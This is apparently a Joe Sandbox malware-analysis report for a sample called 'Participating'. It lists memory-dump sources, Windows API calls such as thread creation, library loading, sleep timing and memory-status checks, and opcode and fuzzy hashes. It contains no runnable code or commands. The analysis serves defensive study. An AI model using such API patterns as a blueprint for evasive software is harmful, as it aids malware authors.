• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00D42394
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D423A6
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D423BC
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D423D7
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
                                                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00CE1AF4
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00D231F9
                                                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00D23203
                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00D2320E
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D4EB14
                                                                                                                                                                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00D4EB47
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00D4EB5D
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00D4EB64
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,?,00D0D369,00000000,00000004,00000000), ref: 00D0D588
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D0D594
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00D0D59B
                                                                                                                                                                                                                                                                  • ResumeThread.KERNEL32(00000000), ref: 00D0D5B9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 173952441-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00CE78B1
                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00CE78C5
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00CE78CF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00D1338D,00000364,00000000,00000000,00000000,?,00D135FE,00000006,FlsSetValue), ref: 00D13418
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00D1338D,00000364,00000000,00000000,00000000,?,00D135FE,00000006,FlsSetValue,00D83260,FlsSetValue,00000000,00000364,?,00D131B9), ref: 00D13424
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D1338D,00000364,00000000,00000000,00000000,?,00D135FE,00000006,FlsSetValue,00D83260,FlsSetValue,00000000), ref: 00D13432
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00D4B69A,?,00008000), ref: 00D4BA8B
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D4B69A,?,00008000), ref: 00D4BAB0
                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00D4B69A,?,00008000), ref: 00D4BABA
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D4B69A,?,00008000), ref: 00D4BAED
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D7888E
                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00D788A6
                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00D788CA
                                                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D788E5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 357397906-0
                                                                                                                                                                                                                                                                  • Opcode ID: f1f02cc917bb0ea5454724db88b5d5af4101b9267594c3607e44ec0689fd69b3
                                                                                                                                                                                                                                                                  • Instruction ID: 2f2fb73a8a6b2a1abac832a78856da776a16e8d871a0386d472a343042405794
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1f02cc917bb0ea5454724db88b5d5af4101b9267594c3607e44ec0689fd69b3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 511143B9D0020DAFDB41CF98D8849EEBBB5FF08310F508156E919E2310E735AA94DF61
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D43712
                                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D43723
                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D4372A
                                                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00D43731
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                  • Opcode ID: cea01706aa5ae45a1339e5021b86d0b7e5adf78450d4cefca76f86137855a1f8
                                                                                                                                                                                                                                                                  • Instruction ID: 7ed0b9eb82c6ed99877fd9684eee0ff20ae06aa70729a16bc04bba0f34bef46c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cea01706aa5ae45a1339e5021b86d0b7e5adf78450d4cefca76f86137855a1f8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACE092B1101328BBDB2017A69C4EEEB7F7DDF42BE1F540015F50AD2180EAA0C980C2B0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00CE1F87
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: SelectObject.GDI32(?,00000000), ref: 00CE1F96
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: BeginPath.GDI32(?), ref: 00CE1FAD
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: SelectObject.GDI32(?,00000000), ref: 00CE1FD6
                                                                                                                                                                                                                                                                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00D792E3
                                                                                                                                                                                                                                                                  • LineTo.GDI32(?,?,?), ref: 00D792F0
                                                                                                                                                                                                                                                                  • EndPath.GDI32(?), ref: 00D79300
                                                                                                                                                                                                                                                                  • StrokePath.GDI32(?), ref: 00D7930E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                  • Opcode ID: d6ff6510ae0d1c140bdad18549bcda461aea1c11af1014f51e3afc55bbe71a23
                                                                                                                                                                                                                                                                  • Instruction ID: cfd6aba9ceedb2cd02f74e4d3904b311dadc24da6f4b5c1d0a6cf9966633f393
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6ff6510ae0d1c140bdad18549bcda461aea1c11af1014f51e3afc55bbe71a23
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CF03A32045358BADB126F54AC0AFCA3A6AAF0A320F048201FA19A12E1D7759562DFB5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(00000008), ref: 00CE21BC
                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00CE21C6
                                                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00CE21D9
                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 00CE21E1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9a2e29e3bb62e4a0b3d3d76ecfb100dbb63be241b21ee435cfbd757f0c65e83b
                                                                                                                                                                                                                                                                  • Instruction ID: 19db244ad513b53702d1d30ab778ddf7b429a44992037da7e16cad8445f96a60
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a2e29e3bb62e4a0b3d3d76ecfb100dbb63be241b21ee435cfbd757f0c65e83b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62E06531240740ABDB215B74BC097E83B22AF12336F148219F7BD941E0D77246809B20
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00D3EC36
                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00D3EC40
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D3EC60
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(?), ref: 00D3EC81
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                  • Opcode ID: 10ba2d31ec2a122c88c8c54216fa1544a3e2b26324b5777b8a115adf2ae5ceee
                                                                                                                                                                                                                                                                  • Instruction ID: 15df726789168a05491c8a1dd7cc887afdc3eb43a483ab8880a4a5e5ed1961f0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10ba2d31ec2a122c88c8c54216fa1544a3e2b26324b5777b8a115adf2ae5ceee
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFE09A75800308DFCF41AFA1D948A6DBBB6EF58311F108459F94EE3390D7785981AF61
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00D3EC4A
                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00D3EC54
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D3EC60
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(?), ref: 00D3EC81
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                  • Opcode ID: 62ba37b07409a62a972a4f94580cfa3c9d0418ad0453dbded9b2ac70f34a00e0
                                                                                                                                                                                                                                                                  • Instruction ID: 4e9ebe6a08ae6496f928ee81bd88f2eb2ea0f9897ee15977dd0ed744b10e0e50
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62ba37b07409a62a972a4f94580cfa3c9d0418ad0453dbded9b2ac70f34a00e0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FE09A75C00308DFCF51AFA1D948A5DBBB6AF58311B108459F94DE3350D77859419F21
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE41EA: _wcslen.LIBCMT ref: 00CE41EF
                                                                                                                                                                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00D55919
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                  • String ID: *$LPT
                                                                                                                                                                                                                                                                  • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                  • Opcode ID: ce69f95c0ff9eba6dcf1dd7d198cee34c399ca722302ee742d2981ef97f24cb1
                                                                                                                                                                                                                                                                  • Instruction ID: ebe179dab39882aa86ceeb4c151c7867208cc45c6ba1b4bc6b7668f7ebb603a3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce69f95c0ff9eba6dcf1dd7d198cee34c399ca722302ee742d2981ef97f24cb1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB917A75A00604DFCB15CF54C4A4EAABBF1AF44314F198099EC4A9F366D735EE89CBA0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00D0E67D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                  • Opcode ID: e0d42717fd9eecd5c512b5d642172ab9451ccb71032cbd93c81cc3bc16b9963a
                                                                                                                                                                                                                                                                  • Instruction ID: 9d82ff8ebebbef6ff9c09cb0a4a58e5ef5e5fba225197a452f7abf8ea5f97fab
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0d42717fd9eecd5c512b5d642172ab9451ccb71032cbd93c81cc3bc16b9963a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17514962E18301B6C716F714F9013EA2BA4EB50B40F684D58F0D9823E9DE368CC5AB76
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                                                  • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                  • Opcode ID: 333246ff5b42b4a5e500a6d14c14319e2e390b4aa4b7e9a1724aac7afa3ba883
                                                                                                                                                                                                                                                                  • Instruction ID: 42a84fcf4275af0a9e33c4f796460d975fc4bf1f58346cc7d02863de0b7ab24a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 333246ff5b42b4a5e500a6d14c14319e2e390b4aa4b7e9a1724aac7afa3ba883
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4751447150434A9FCB25DF28C440ABABBA5EF15310F688055F9A59B2D0DB709E82EB72
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00CFF6DB
                                                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00CFF6F4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
